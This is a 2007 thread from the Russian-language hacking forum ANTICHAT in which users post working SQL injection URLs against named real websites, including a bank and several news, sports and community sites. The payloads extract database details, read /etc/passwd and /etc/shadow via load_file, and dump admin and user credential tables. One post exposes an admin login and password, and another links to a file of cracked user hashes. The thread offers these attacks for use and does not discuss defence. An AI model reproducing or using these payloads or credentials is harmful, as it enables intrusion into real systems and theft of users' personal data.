ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3281  
Старый 12.10.2007, 14:04
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
http://www.barrowfc.com/index.php?inc=player&id=-5+union+select+1,2,3,4,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24
4.1.21-standard
barrowfc_results
barrowfc_barrowf@localhost


Цитата:
http://www.enlajugada.com/principal/ver_nota.php?idn=-10+union+select+1,2,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f686f737473),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f7379736c6f672e636f6e66),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f7365727669636573),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f67726f7570),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f6e6574776f726b73),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f70726f66696c65),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49/*
4.0.24
enlajugada
enlajugada@localhost


Цитата:
http://f1latam.com/noticias.php?idn=-3452+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C 62723E,VERSION(),DATABASE(),USER()),11,12
4.1.22-standard
henrybcu_dbflatam
henrybcu_f1lat07@localhost


Цитата:
http://www.considi.it/news.php?idn=-8+union+select+1,2,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),4,5,6,7,8,9,10,11/*
5.0.45-community-log
Sql154922_1
Sql154922@62.149.140.47

Последний раз редактировалось NOmeR1; 12.10.2007 в 14:36..
 
Ответить с цитированием

  #3282  
Старый 12.10.2007, 14:42
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

www.autozel.ru

http://www.autozel.ru/index.php?page=document&d_id=-5272+union+select+1,2,3,4,5,6,7,8,concat(version() ,0x3a,database(),0x3a,user()),10,11,12,13/*

4.1.11:autozel1_aaaa:website@localhost

http://www.autozel.ru/index.php?page=document&d_id=-5272+union+select+1,2,3,concat(username,0x3a,user_ password,0x3a,user_icq),5,6,7,8,9,10,11,12,13+from +phpbb_users+limit+1,1/*

имя \ хеш \ уин
 
Ответить с цитированием

  #3283  
Старый 12.10.2007, 18:38
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Национальный Банк Развития
Цитата:
http://www.nbd.ru/ns/about/news/?id=-53+union+sele ct+1,2,LOAD_FILE('/etc/passwd'),4,5,6, 7,8,9,10,11,12,13/*
Также используя LOAD_FILE: /etc/networks, /etc/group, /etc/services, /etc/hosts, /etc/profile
Version: 4.0.10-gamma
User: root@localhost
 
Ответить с цитированием

  #3284  
Старый 12.10.2007, 19:39
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию



код:

http://www.zonanu.nu/anketa.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,concat_ws(0x3a,login,pass),34,35+from+u57027_2.o snova/*

+

http://www.paradiz.nu/news.php?id=-9+union+select+1,concat(login,0x3a,password),3,4+f rom+u57027_3.fs_admin/*

всего их четыре сайта,но на всех одна и та-же бд


___________________________________________



код:

http://otdohni.nu/full_view.php?id=-130+union+select+1,concat(table_name,0x3a,column_n ame),3,4+from+information_schema.columns/*
код:

http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass),3 ,4+from+admins/*
код:

http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass,ma il,tel),3,4+from+clients/*
код:


http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass,ma il,tel),3,4+from+users/*

админка

http://otdohni.nu/admin
login/pass:
xs7df9023fgh55:dsfgy877gfh7gv5h8m76gh



 
Ответить с цитированием

  #3285  
Старый 12.10.2007, 19:56
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
http://www.obdesigualtats.org/obd/lstcontenido.php?IDC=&IDA=-1+union+select+1,2,concat_ws(0x3C62723E,0x3C62723E ,VERSION(),DATABASE(),USER(),0x3C62723E),4/*
4.0.24_Debian-10sarge2-log
obdesigualtats
obdesigualtats@pau.pangea.org

Цитата:
http://www.phpvillage.org/member.php?idu=-1+union+select+concat_ws(0x3C62723E,VERSION(),DATA BASE(),USER()),2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
4.1.22-standard
phpvilla_php
phpvilla_root@localhost

Цитата:
http://www.simplog.org/archive.php?blogid=1&pid=-56+union+select+1,2,3,4,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f736861646f77),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f686f737473),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f7379736c6f672e636f6e66),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f7365727669636573),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f67726f7570),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f70726f66696c65),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f626173687263),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f736b656c2f2e626173687263),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f7068702e696e69),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f 6e66),6,7,8
4.1.20
blog
root@localhost

Последний раз редактировалось NOmeR1; 12.10.2007 в 20:57..
 
Ответить с цитированием

  #3286  
Старый 12.10.2007, 21:41
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Пипец. nasa-academy.org <- 86 столбцов.
Цитата:
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x3C62723E,VERSION(),DATABASE(),USER(),0x3C62723E),30,
31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,
61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,table_name,30,
0x3C62723E,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,
61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86+from+information_schem a.tables+limit+16,1
5.0.26-max-log
academy
academy@localhost

Блин, чё, наса не могут нанять нормальных спецов, чтобы сделали сайт без багов?
 
Ответить с цитированием

  #3287  
Старый 12.10.2007, 23:08
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию

Код:
http://omsk.arsec.ru/modules/articles/article.php?id=1+union+select+1,2,3,4,5,6,concat(uname,0x3a,pass),8,9,1,2,3,4,5,6,7,8,9,1,2+from+u26773.ars_users+limit+1,1/*
admin:48c7b8a13ce1f0fbbec213d87ebcda5e

Цитата:
http://www.vitz.ru/firms.php?cat=services&re=-58+union+select+1,2,3,concat(name,0x3a,password),i cq_number,concat(ip_address,0x3a,email),7,8+from+v itz_forums.ibf_members/*

Сразу вся база имя\хеш\уин\IP\email 5931 записей ) жаль что IPB (
Расшифровал. (Пользователей:4996, Найдено:3220)
http://rapidshare.com/files/62099632/hashes.rar.html
 
Ответить с цитированием

  #3288  
Старый 13.10.2007, 07:49
WebeX
Новичок
Регистрация: 31.03.2007
Сообщений: 22
Провел на форуме:
85992

Репутация: -1
По умолчанию

http://www.0629.com.ua/view_news.php?id_news=
Только не пойму чего с ней делать!
 
Ответить с цитированием

  #3289  
Старый 13.10.2007, 08:10
valiko
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085

Репутация: 452
По умолчанию

Код:
http://www.house-ua.com/item.php?skin=kv_pr&id=-23468'+union+select+user(),version(),database()/*
 
Ответить с цитированием

  #3290  
Старый 13.10.2007, 09:44
sulaspaka
Новичок
Регистрация: 02.10.2007
Сообщений: 3
Провел на форуме:
17402

Репутация: 2
По умолчанию

помогите pаскрутит

Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,4,5/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ